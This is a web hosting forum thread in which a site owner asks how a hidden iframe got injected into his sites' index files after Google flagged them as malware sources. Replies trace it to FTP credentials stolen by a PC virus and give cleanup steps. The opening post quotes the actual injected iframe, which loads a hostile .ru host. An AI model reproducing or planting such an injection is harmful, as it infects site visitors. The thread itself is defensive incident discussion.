Iframe injection attack (Help please)

[photoshopfreak]

Hi, I need help understanding the iframe injection attack and how it is performed by the hacker, and furthermore how it affects different accounts on my VPS - The reason I need to know is below:

I got an email from Google saying that they added one of my sites to their list of ‘bad ware sites’, the email was as follows:

Subject: Malware notification regarding *************.com
Date: 01/09/2009 19:07:08 GMT Daylight Time
From: [email protected]
Reply To:
To: abuse@*************.com, admin@*************.com, administrator@*************.com, contact@*************.com, info@*************.com, postmaster@*************.com, webmaster@*************.com
Sent from the Internet (Details)

Dear site owner or webmaster of *************.com,

We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.

Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):

http://************* .com/
http://www.************* .com/

Here is a link to a sample warning page:
http://www.google.com/interstitial?url=http://*************.com/

We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiser


If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
StopBadware.org - Tips for Cleaning & Securing Your Website

Once you've secured your site, you can request that the warning be removed by visiting
My site's been hacked - Webmasters/Site owners Help
and requesting a review. If your site is no longer harmful to users, we will remove the warning.

Sincerely,
Google Search Quality Team

This site did not contain spyware (that I knew of) so I did an audit by data modified via FTP to see if any files had been hacked, checking the recently modified files I discovered they did contain an iframe:

Do not visit the URL (as it contains a virus)

<iframe src="http://u7n.ru:8080/index.php" width=177 height=158 style="visibility: hidden"></iframe>

I removed that above code from one of my sites, then proceeded to check the others; all contain that above code or a similar code (different URL), all index.(xxxx) files have been inserted with the above JavaScript on affected accounts.

What I need to know is how did they get in? and how do I prevent this from happening again, because if I put these files back from backups - they will just be open to exploit again.

I contacted my host to ask how the hackers did it and how to prevent it from happening again, they said:

We are sorry to hear that you are facing this problem. This kind of attack is known as iframe injection attack which only effects the index.xxx files. This is caused either due to weak FTP passwords or due to some vulnerability in the scripts. As you said the passwords are strong so the later one can be the cause in your case. Still I recommend you to reset all the passwords of the accounts and then audit them.

I am certain they don't have my password as I have roboform and never manually enter passwords or use my hosting passwords elsewhere, besides my hosting passwords are 'strong'. (but I will be changing them all incase)

So I suspect they may have inserted the code via a vulnerability in one of the scripts.

However if one script was vulnerable say for instance (vBulletin or phpbb) on one account/site on the VPS:

1. Then how did they modify and insert code into other sites/accounts on the VPS that were not using the script?
   
2. Why were some accounts not affected by the ‘iframe injection attack’?
   
3. What is the best way to find out exactly where the vulnerability is and how the hacker did what they did?
   
4. Any other security advice or ways to 'lockdown' a VPS?

I really need help understanding this as I have a VPS with around 21 accounts (my sites), all using different passwords and scripts; I’m not host savvy at all.

Just removing this simple insertion into each index file is an enormous task due to the amount of accounts and index files, not to mention my visitors getting viruses

The only good thing that happened was Google informed me of the attack and very quickly (ie 1 day) - The price to pay, Google labeling my sites as badware:td:.

 

[tulip4heaven]

HI , me too have this problem , You will remove this code and code will again injected , You just need to change the ftp password of all your sites including root User of your VPS.
This solution works for me

 

[SiberForum]

You need to check if your web application do not have any holes. Double check updates. That is recommended to change web host. Just in case

 

[photoshopfreak]

I have researched the iframe injection attack on the web and discovered that a virus name kriptik (sp) infects pc's, then sends the FTP login info (from the ftp program) to a remote machine to access the sites and then injects the code.

I was aware that a few days ago I had a major infection on my PC, it was that bad that I could not even get windows to load even in safe mode, eventually I had to repair windows XP 3 times. Then I spent two days finding the spyware, just got clean today.

So when I found my sites hacked I was extremely unhappy as it happened twice, in reality it happened once!

So as careful as I am with passwords, they still got them due to a PC virus.


Whilst typing this all sites that I cleared are now reinfected again, more notices from Google about badware, so now I know the cause I can get to work and stop this dead.

Thanks for your replies.

 

[WeWatch]

The three character domain followed by either .ru, .kw, .cn or any other TLDs, followed by a port designation (:8080) have been the result of compromised FTP credentials.

photoshopfreak is correct. It is a series of viruses implanted on various PCs (and some Macs we've seen) that does little more than steal FTP credentials.

It works in a variety of ways.

First, it knows the files and their default locations of various FTP software, FileZilla, WS_FTP and many, many others. When users tell their software to save their logon credentials, it saves this information in a file on the computer. Then when you want to send an update to your website, the login information is already there.

The virus looks for these files, opens them, reads the information and then sends it to a server where it's used to login to the website with valid credentials. There's no need to "crack" the password. Which is why strong passwords aren't a defense in this case.

Second, the virus installs a keyboard logger. This variant is relatively new because earlier this year the hackers saw that everyone was telling people not to save their FTP username and passwords, so the hackers started installing keyboard loggers for those who type their passwords in each time. Same follow-through, the stolen information is sent to a server that infects the web site.

Third, the virus "sniffs" the FTP traffic leaving the PC. Since FTP transmits all data, including username and password, in plain text, it's easy for the virus to see the username and password, capture it, send it to a server and ... (you get the idea).

Fourth, and is the most recent, the virus will inject the malscript (the infectious iframe) into the FTP data stream as it leaves the user's PC. This latest variant is sneaky in that the website logs will show that FTP traffic originated from a valid source, with valid FTP credentials.

The best way I've found to combat this is by following these steps:

Step 1: Install a new anti-virus program. Obviously this virus knows how to evade detection of the current anti-virus. It doesn't matter what's being used currently, you have to install something different.

Step 2: Login to your control panel at your web hosting provider's site and change your FTP password. Write it down at this point DO NOT ACCESS YOUR SITE with FTP until you finish all of these steps.

Step 3: Scan and clean every PC that has FTP access to your site. This is also a must. Otherwise you have no idea who's PC it is. Do not give the new FTP passwords to anyone until after you have finished all of these steps.

Step 4: Remove the malicious code from your webpages. If you have a known good back-up, use that. If not, download your site (yes you'll have to type in the new password, but hopefully you're already scanned and cleaned your PC). Then open each file in your HTML editor and find the infectious code. This particular malscript usually hides immediately after the opening body tag, but we've also seen it at the end of files. You'll have to check every file on your website not just index files or just html files. Check every file on your website even .js and .css files.

Step 5: Change your FTP passwords again.

Step 6: If you've been blacklisted by Google, login to your Google Webmaster Tools and verify your site if you haven't already, then request a review. You'll have to click on your site, then across the top you'll see in your dashboard a label in dark background that says, "This site may be distributing malware. More Details (which is a link). Click on that and request a review. If your site is clean, Google should bless you with removing that warning from SERPs.

Then you should have that issue again.

This is not the result of a faulty script or weak FTP passwords. It's the result of a virus on PC with FTP access to the infected website.

If you have further questions regarding this, post here and I'll try to help.

 

[rumsfo]

Just work on this in pair with your web hosting provider. They must have more experience on this

 

[photoshopfreak]

WeWatch, do you know of any good FTP programs that encrypt and lock the data in the saved sites list, or are more secure generally?

I have cleaned my desktop now, scanned with everything going lol, but the laptop needs the same doing to it, so until that is clean I'm not using FTP on their.

 

[bluearrow]

I had same problem. bit more worse. Guys if you are having this iframe injection attack then check all your .htaccess files because you might find those have been all replaced by this virus. To get everything clear I had to,

*Scan and clean my PC ( formatted it in my case )
*change all your FTP passwords and use SFTP if you can
*Change yr hosting and database passwords
*Check all files for this code not just index pages. I found it everywhere you have <body> tag
*Check all your .htaccess files you might find one in every folder, created by this virus
*Check your CMOD file permissions

If you use Dreamweaver you can get rid of this Iframe easily. goto Edit and select Find and Replace. put Ifram code in Find box and put just a space or leave black replace box. Also select right option in "Find in".

 

[.Andy]

Talk to your host you they may have a backup and will restart your account (like new) so you can be secure. Change your Database passwords as well as its always possible they went after those to.

 

[bluearrow]

If a shared account get infected by this Iframe thing can it spread to reseller account of it too ? because I deleted and recreated one shared account and I found there is different iframe in it now.

 

[photoshopfreak]

If a shared account get infected by this Iframe thing can it spread to reseller account of it too ? because I deleted and recreated one shared account and I found there is different iframe in it now.

If it is exactly what I had.

The answer is no it can't spread, they need the FTP info to each account, so the only way it could spread is if they had the passwords of the shared account (which they must of got) and reseller, or they got the shared account password and it's the same password as the reseller account.

I have a VPS similar which is similar to a reseller account, ie a bigger account that allows me to create many sites. When I got hacked only the accounts that I had accessed via my FTP program were hacked, some accounts that I had not saved in my FTP bookmarks were unaffected, all were on the same VPS.

So it's a matter of have they got the password? not can it spread, as it can only spread if they have the password.

 

[~ServerPoint~]

You need to change your web host. Use the latest wversions of the web application to avoid that in the future

 

[bluearrow]

Before I saw this topic I had posted same thing at DP. Someone helped me to get rid of them. Though couldn't do anything about the Godaddy account since they refuse to give shell mode access. He is the one who posted there as SecureCP. If you have a DP account PM him and ask him to help you.

How to get rid of this iframe script ?

 

[moustik]

Detect Malicious iframe with software

For to get rid of the malicious iframe on my FTP server (and believe me, i was deeply invest...), i use Iframe.Attack V1.1, It's a small software (in PHP i guess) capable to scan all your FTP for looking for Iframe, The soft build a listing of infected iframe and give you the possibility to remove the malicious iframe in one shot, greatfull help if you have a lot of files on your server. Of course, you need to clean your own computeur with your antivirus (for take off the Trojan who has stollen your FTP password), and change also your FTP password. Now, my FTP seems clean.

Hope that can be helpfull, moustik
Note : the software is available in english